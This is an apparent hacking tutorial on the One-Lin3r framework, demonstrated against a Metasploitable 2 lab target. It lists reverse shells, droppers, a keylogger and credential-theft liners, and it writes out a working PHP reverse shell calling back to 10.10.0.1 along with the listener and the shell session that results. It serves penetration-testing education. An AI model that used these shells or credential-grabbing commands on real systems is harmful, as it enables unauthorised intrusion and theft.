A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.
One-Lin3r is a Python tool that acts as a framework to automate the generation of one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.
- Don't Miss: Hack UnrealIRCd Using Python Socket Programming
In this tutorial, we will be using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup to follow along. Once we get to Step 6 below, things will vary based on which one-liner you choose, so things could be very different since we're only showing a few examples here.
Step 1: Install One-Lin3r
The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need. If you don't have pip3, you can install it with:
~# apt install python3-pip
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
python-pip-whl
The following packages will be upgraded:
python-pip-whl python3-pip
2 upgraded, 0 newly installed, 0 to remove and 500 not upgraded.
Need to get 2,054 kB of archives.
After this operation, 125 kB disk space will be freed.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Fetched 2,054 kB in 1s (2,792 kB/s)
Reading changelogs... Done
(Reading database ... 358625 files and directories currently installed.)
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) over (20.0.2-5) ...
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) over (20.0.2-5) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...
Then, to install One-Lin3r, use:
~# pip3 install one-lin3r
Collecting one-lin3r
Downloading one-lin3r-2.1.tar.gz (530 kB)
|████████████████████████████████| 530 kB 1.1 MB/s
Requirement already satisfied: prompt_toolkit in /usr/lib/python3/dist-packages (from one-lin3r) (3.0.5)
Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.8.0)
Collecting terminaltables
Downloading terminaltables-3.1.0.tar.gz (12 kB)
Building wheels for collected packages: one-lin3r, terminaltables
Building wheel for one-lin3r (setup.py) ... done
Created wheel for one-lin3r: filename=one_lin3r-2.1-py3-none-any.whl size=98517 sha256=4a8b3602329c770cb1c5a0af6fce25068e1c6ca9298c0b1dbee469856f67f403
Stored in directory: /home/kali/.cache/pip/wheels/77/05/5a/6cfde98092f3a965cbc9b34ceacdaa306f7860238ace2b507e
Building wheel for terminaltables (setup.py) ... done
Created wheel for terminaltables: filename=terminaltables-3.1.0-py3-none-any.whl size=15354 sha256=d27bd634201dfb06449264a7bf3eea578bdff2b786b6923bb44ee9f9e8908d7f
Stored in directory: /home/kali/.cache/pip/wheels/08/8f/5f/253d0105a55bd84ee61ef0d37dbf70421e61e0cd70cef7c5e1
Successfully built one-lin3r terminaltables
Installing collected packages: terminaltables, one-lin3r
Successfully installed one-lin3r-2.1 terminaltables-3.1.0
If you get a warning about how one-lin3r is installed in a directory that's not on PATH, open up your ~/.bashrc file in a text editor like nano or vim and add "export PATH=$PATH:/" followed by the path of the script at the end of the file and save it.
Step 2: Get to Know Its Basic Usage
Now, we can run the basic help menu by tacking on the -h flag:
~# one-lin3r -h
usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]
optional arguments:
-h, --help show this help message and exit
-r R Execute a resource file.
-x X Execute a specific command (use ; for multiples).
-q Quiet mode (no banner).
One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:
~# one-lin3r
zeeeeee-
z$$$$$$"
d$$$$$$"
d$$$$$P
d$$$$$P
$$$$$$"
.$$$$$$"
.$$$$$$"
4$$$$$$$$$$$$$"
z$$$$$$$$$$$$$"
"""""""3$$$$$"
z$$$$P
d$$$$" One-Lin3r By D4Vinci - V2.1
.$$$$$" A framework where all your liners belongs to...
z$$$$$" Loaded 176 liner(s).
z$$$$P
d$$$$$$$$$$"
*******$$$"
.$$$"
.$$"
4$P"
z$"
zP
z"
/
^
OneLiner >
Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.
Typing help or ? will give us the detailed help menu:
OneLiner > ?
Command Description
-------- -------------
help/? Show this help menu.
list/show List all one-liners in the database.
search [Keywords..] Search database for a specific liner by its name, author name or description.
use <liner> Use an available one-liner.
copy <liner> Use an available one-liner and copy it to clipboard automatically.
info <liner> Get information about an available liner.
set <variable> <value> Sets a context-specific variable to a value to use while using one-liners.
variables Prints all previously specified variables.
banner Display banner.
reload/refresh Reload the liners database.
check Prints the core version and checks if you are up-to-date.
history Display command-line most important history from the beginning.
makerc Save command-line history to a file.
resource <file> Run the commands stored in a file
os <command> Execute a system command without closing the framework
exit/quit Exit the framework
Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this. For example:
OneLiner > os uname -a
Linux kali 5.5.0-kali2-amd64 #1 SMP Debian 5.5.17-1kali1 (2020-04-21) x86_64 GNU/Linux
Step 3: List the One-Liners
We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one. As of June 16, 2020, there are 176 one-liners available.
OneLiner > list
# | Name | Function
-----+-------------------------------------------------------------+--------------------
1 | linux/awk/reverse_udp | Reverse Shell
2 | linux/awk/bind_tcp | Bind Shell
3 | linux/awk/reverse_tcp | Reverse Shell
4 | linux/ncat/reverse_udp | Reverse Shell
5 | linux/ncat/reverse_tcp_ssl | Reverse Shell
6 | linux/ncat/reverse_tcp | Reverse Shell
7 | linux/openssl/reverse_tcp | Reverse Shell
8 | linux/nodejs/reverse_tcp | Reverse Shell
9 | linux/nc/reverse_udp | Reverse Shell
10 | linux/nc/reverse_tcp_mknod | Reverse Shell
11 | linux/nc/bind_tcp | Bind Shell
12 | linux/nc/reverse_tcp_mkfifo | Reverse Shell
13 | linux/nc/bind_tcp_mkfifo | Bind Shell
14 | linux/nc/reverse_tcp | Reverse Shell
15 | linux/go/reverse_tcp | Reverse Shell
16 | linux/java/reverse_tcp | Reverse Shell
17 | linux/perl/bind_udp | Bind Shell
18 | linux/perl/reverse_udp_miosocket | Reverse Shell
19 | linux/perl/bind_tcp | Bind Shell
20 | linux/perl/reverse_tcp_miosocket | Reverse Shell
21 | linux/perl/reverse_tcp | Reverse Shell
22 | linux/python/reverse_udp | Reverse Shell
23 | linux/python/bind_udp | Bind Shell
24 | linux/python/http_server | Dropper
25 | linux/python/bind_tcp | Bind Shell
26 | linux/python/reverse_tcp_interactive | Reverse Shell
27 | linux/python/reverse_tcp | Reverse Shell
28 | linux/php/bind_udp | Bind Shell
29 | linux/php/bind_tcp | Bind Shell
30 | linux/php/reverse_tcp | Reverse Shell
31 | linux/telnet/reverse_tcp_mknod | Reverse Shell
32 | linux/telnet/reverse_tcp_mkfifo | Reverse Shell
33 | linux/lua/reverse_tcp_bash | Reverse Shell
34 | linux/lua/reverse_tcp | Reverse Shell
35 | linux/ruby/bind_udp | Bind Shell
36 | linux/ruby/bind_tcp | Bind Shell
37 | linux/ruby/reverse_tcp | Reverse Shell
38 | linux/socat/bind_udp | Bind Shell
39 | linux/socat/reverse_tcp | Reverse Shell
40 | linux/bash/list_cronjobs_for_current_user | PrivEsc
41 | linux/bash/get_bash_history_for_all_user | PrivEsc
42 | linux/bash/search_for_writeable_folders_files | PrivEsc
43 | linux/bash/search_for_password_using_grep | PrivEsc
44 | linux/bash/find_suid | PrivEsc
45 | linux/bash/get_ssh_private_keys_for_all_users | PrivEsc
46 | linux/bash/get_apache_site_enabled | PrivEsc
47 | linux/bash/get_aws_security_credentials | PrivEsc
48 | linux/bash/search_for_password_using_find | PrivEsc
49 | linux/bash/list_systemd_timers | PrivEsc
50 | linux/bash/reverse_tcp_exec | Reverse Shell
51 | linux/bash/search_for_password_in_memory | PrivEsc
52 | linux/bash/exploit_writeable_sudoers | PrivEsc
53 | linux/bash/get_last_edited_files | PrivEsc
54 | linux/bash/list_all_capabilities | PrivEsc
55 | linux/bash/reverse_tcp | Reverse Shell
56 | linux/bash/list_cronjobs_for_all_users | PrivEsc
57 | linux/bash/exploit_docker_bash_container | PrivEsc
58 | linux/bash/list_cronjobs_for_another_user | PrivEsc
59 | linux/tclsh/reverse_tcp | Reverse Shell
60 | multi/msfvenom/linux_elf_reverse_meterpreter | Msfvenom Generator
61 | multi/msfvenom/java_jsp_reverse_shell | Msfvenom Generator
62 | multi/msfvenom/windows_asp_reverse_meterpreter | Msfvenom Generator
63 | multi/msfvenom/unix_perl_reverse_shell | Msfvenom Generator
64 | multi/msfvenom/php_reverse_meterpreter | Msfvenom Generator
65 | multi/msfvenom/unix_python_reverse_shell | Msfvenom Generator
66 | multi/msfvenom/unix_bash_reverse_shell | Msfvenom Generator
67 | multi/msfvenom/windows_exe_reverse_meterpreter | Msfvenom Generator
68 | multi/msfvenom/java_war_reverse_shell | Msfvenom Generator
69 | multi/msfvenom/osx_macho_reverse_shell | Msfvenom Generator
70 | multi/nmap/ftp_bruteforce | Nmap script
71 | multi/nmap/http_enumerate | Nmap script
72 | multi/nmap/full_vulnerability_scan | Nmap script
73 | multi/nmap/google_malware_check | Nmap script
74 | multi/nmap/common_malware_scan | Nmap script
75 | multi/nmap/slowloris_attack | Nmap script
76 | windows/cmd/dll_dropper_rundll32 | Dropper
77 | windows/cmd/win_remote_management | Execute
78 | windows/cmd/search_for_passwords | PrivEsc
79 | windows/cmd/exe_dropper_bitsadmin | Dropper
80 | windows/cmd/read_registry_winlogon_key | PrivEsc
81 | windows/cmd/list_scheduled_tasks | PrivEsc
82 | windows/cmd/exe_dropper_certutil | Dropper
83 | windows/cmd/read_registry_runonce_key | PrivEsc
84 | windows/cmd/list_arp_tables | PrivEsc
85 | windows/cmd/runas_with_creds | Execute
86 | windows/cmd/list_processes_running_as_system | PrivEsc
87 | windows/cmd/read_registry_always_install_elevated_key_lm | PrivEsc
88 | windows/cmd/list_localgroups | PrivEsc
89 | windows/cmd/hta_dropper_mshta | Dropper
90 | windows/cmd/list_startup_folder_currentuser | PrivEsc
91 | windows/cmd/read_registry_always_install_elevated_key_cu | PrivEsc
92 | windows/cmd/read_firewall_config | PrivEsc
93 | windows/cmd/list_logon_requirements | PrivEsc
94 | windows/cmd/get_systeminfo | PrivEsc
95 | windows/cmd/list_routing_tables | PrivEsc
96 | windows/cmd/read_registry_putty_sessions | PrivEsc
97 | windows/cmd/search_registry_for_passwords_lm | PrivEsc
98 | windows/cmd/list_startup_folder_allusers | PrivEsc
99 | windows/cmd/read_registry_vnc_passwords | PrivEsc
100 | windows/cmd/xsl_dropper_wmic | Dropper
101 | windows/cmd/list_network_shares | PrivEsc
102 | windows/cmd/sct_dropper_rundll32 | Dropper
103 | windows/cmd/search_registry_for_passwords_cu | PrivEsc
104 | windows/cmd/msi_quiet_installer | Execute
105 | windows/cmd/get_saved_wifi_passwords | PrivEsc
106 | windows/cmd/sct_dropper_regsvr32 | Dropper
107 | windows/cmd/bat_dropper | Dropper
108 | windows/cmd/list_installed_updates | PrivEsc
109 | windows/cmd/list_users | PrivEsc
110 | windows/cmd/list_running_processes | PrivEsc
111 | windows/cmd/dll_dropper_regasm | Dropper
112 | windows/cmd/execute_over_forfiles | Execute
113 | windows/cmd/list_user_privileges | PrivEsc
114 | windows/cmd/read_services_with_wmic | PrivEsc
115 | windows/cmd/get_snmp_config | PrivEsc
116 | windows/cmd/sct_dropper_mshta | Dropper
117 | windows/cmd/get_architecture | PrivEsc
118 | windows/cmd/read_services_with_tasklist | PrivEsc
119 | windows/cmd/read_registry_snmp_key | PrivEsc
120 | windows/cmd/list_current_connections | PrivEsc
121 | windows/cmd/dll_dropper_certutil_base64 | Dropper
122 | windows/cmd/read_registry_run_key | PrivEsc
123 | windows/cmd/list_unqouted_services | PrivEsc
124 | windows/cmd/execute_c#_files | Execute
125 | windows/cmd/list_drives | PrivEsc
126 | windows/cmd/disable_firewall_netsh | PrivEsc
127 | windows/cmd/list_network_interfaces | PrivEsc
128 | windows/cmd/msi_dropper_wininstaller | Dropper
129 | windows/cmd/dll_loader_control_panel | Loader
130 | windows/cmd/read_registry_r_key | PrivEsc
131 | windows/cmd/list_startup_tasks_with_wmic | PrivEsc
132 | windows/cmd/dll_loader_word | Loader
133 | windows/cmd/get_saved_wifi_aps_ssid | PrivEsc
134 | windows/scan/check_netapi | Nmap script
135 | windows/scan/check_eternal_blue | Nmap script
136 | windows/wsl/runas_with_creds | Execute
137 | windows/nc/bind_tcp | Bind Shell
138 | windows/nc/reverse_tcp | Reverse Shell
139 | windows/perl/bind_udp | Bind Shell
140 | windows/perl/bind_tcp | Bind Shell
141 | windows/perl/reverse_tcp | Reverse Shell
142 | windows/groovysh/reverse_tcp | Reverse Shell
143 | windows/python/bind_udp | Bind Shell
144 | windows/python/bind_tcp | Bind Shell
145 | windows/python/reverse_tcp_threaded | Reverse Shell
146 | windows/python/reverse_tcp | Reverse Shell
147 | windows/php/bind_udp | Bind Shell
148 | windows/php/bind_tcp | Bind Shell
149 | windows/lua/reverse_tcp | Reverse Shell
150 | windows/ruby/bind_udp | Bind Shell
151 | windows/ruby/bind_tcp | Bind Shell
152 | windows/ruby/reverse_tcp | Reverse Shell
153 | windows/powershell/list_installed_programs_using_folders | PrivEsc
154 | windows/powershell/list_scheduled_tasks | PrivEsc
155 | windows/powershell/list_arp_tables | PrivEsc
156 | windows/powershell/get_iis_config | PrivEsc
157 | windows/powershell/ps1_dropper | Dropper
158 | windows/powershell/setup_powerup_powertools | PrivEsc
159 | windows/powershell/reverse_tcp_string | Reverse Shell
160 | windows/powershell/list_routing_tables | PrivEsc
161 | windows/powershell/bind_tcp | Bind Shell
162 | windows/powershell/get_saved_wifi_passwords | PrivEsc
163 | windows/powershell/list_installed_programs_using_registry | PrivEsc
164 | windows/powershell/list_running_processes | PrivEsc
165 | windows/powershell/meterpreter_shell | Reverse Shell
166 | windows/powershell/setup_session_gopher | PrivEsc
167 | windows/powershell/list_unqouted_services | PrivEsc
168 | windows/powershell/setup_keylogger_powersploit | Keylogger
169 | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
170 | windows/powershell/ps1_dropper_rundll32 | Dropper
171 | windows/powershell/reverse_tcp | Reverse Shell
172 | windows/powershell/list_network_interfaces | PrivEsc
173 | windows/powershell/ps1_dropper_microsoft_syncappv | Dropper
174 | openbsd/nc/bind_udp | Bind Shell
175 | openbsd/nc/reverse_tcp | Reverse Shell
176 | openbsd/bash/read_doas_config | PrivEsc
Step 4: Search for a One-Liner
We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.
For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.
OneLiner > search linux php
# | Name | Function
-----+-----------------------+---------------
1 | linux/php/bind_udp | Bind Shell
2 | linux/php/bind_tcp | Bind Shell
3 | linux/php/reverse_tcp | Reverse Shell
Step 5: Get More Info About a One-Liner
We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.
OneLiner > info linux/php/reverse_tcp
[+] Liner added by => vesche
[+] Function => Reverse Shell
[+] Variables used => TARGET, PORT
[+] Description => Uses PHP sockets & exec to create a reverse shell.
Step 6: Load Any One-Liner
Once we've found a suitable item, we can load it with the use command. I'm using a reverse shell as an example. Once we do so, it will give us the actual line that we need to copy and run.
OneLiner > use linux/php/reverse_tcp
[+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Step 7: List & Set Variables
In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:
OneLiner > variables
# | Name | Value
---+-----------+-------
1 | TARGET | None
2 | PORT | None
3 | URL | None
4 | COMMAND | None
5 | FILE_PATH | None
6 | USERNAME | None
7 | PASSWORD | None
Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:
OneLiner > set target 10.10.0.1
[+] Variable target set to 10.10.0.1
And the desired port so it can connect back to our listener:
OneLiner > set port 4321
[+] Variable port set to 4321
Now when we display the variables again, we can see that our values are set:
OneLiner > variables
# | Name | Value
---+-----------+-----------
1 | TARGET | 10.10.0.1
2 | PORT | 4321
3 | URL | None
4 | COMMAND | None
5 | FILE_PATH | None
6 | USERNAME | None
7 | PASSWORD | None
Step 8: Use the Chosen One-Liner
Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice, which we'd use in a new terminal window:
~# nc -lvp 4321
listening on [any] 4321 ...
Next, back in the One-Lin3r terminal window, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:
OneLiner > use linux/php/reverse_tcp
[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:
OneLiner > copy linux/php/reverse_tcp
[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Liner copied to clipboard successfully!
From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:
10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
sh: no job control in this shell
sh-3.2$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can now run commands like id to verify we have compromised a user on the system.
Step 9: Perform Privilege Escalation
Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.
First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.
Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp
Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:
OneLiner > search linux privesc
# | Name | Function
-----+-----------------------------------------------+----------
1 | linux/bash/list_cronjobs_for_current_user | PrivEsc
2 | linux/bash/get_bash_history_for_all_user | PrivEsc
3 | linux/bash/search_for_writeable_folders_files | PrivEsc
4 | linux/bash/search_for_password_using_grep | PrivEsc
5 | linux/bash/find_suid | PrivEsc
6 | linux/bash/get_ssh_private_keys_for_all_users | PrivEsc
7 | linux/bash/get_apache_site_enabled | PrivEsc
8 | linux/bash/get_aws_security_credentials | PrivEsc
9 | linux/bash/search_for_password_using_find | PrivEsc
10 | linux/bash/list_systemd_timers | PrivEsc
11 | linux/bash/search_for_password_in_memory | PrivEsc
12 | linux/bash/exploit_writeable_sudoers | PrivEsc
13 | linux/bash/get_last_edited_files | PrivEsc
14 | linux/bash/list_all_capabilities | PrivEsc
15 | linux/bash/list_cronjobs_for_all_users | PrivEsc
16 | linux/bash/exploit_docker_bash_container | PrivEsc
17 | linux/bash/list_cronjobs_for_another_user | PrivEsc
Let's take a look at this one, which will list any cron jobs for the current user:
OneLiner > info linux/bash/list_cronjobs_for_current_user
[+] Liner added by => Karim shoair (D4Vinci)
[+] Function => PrivEsc
[+] Variables used => None
[+] Description => List all crob jobs for current user
Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:
OneLiner > copy linux/bash/list_cronjobs_for_current_user
[+] Your liner is: crontab -l
[+] Liner copied to clipboard successfully!
We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:
www-data@metasploitable:/var/tmp$ crontab -l
no crontab for www-data
We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.
Wrapping Up
Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.
Cover image by EVG photos/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!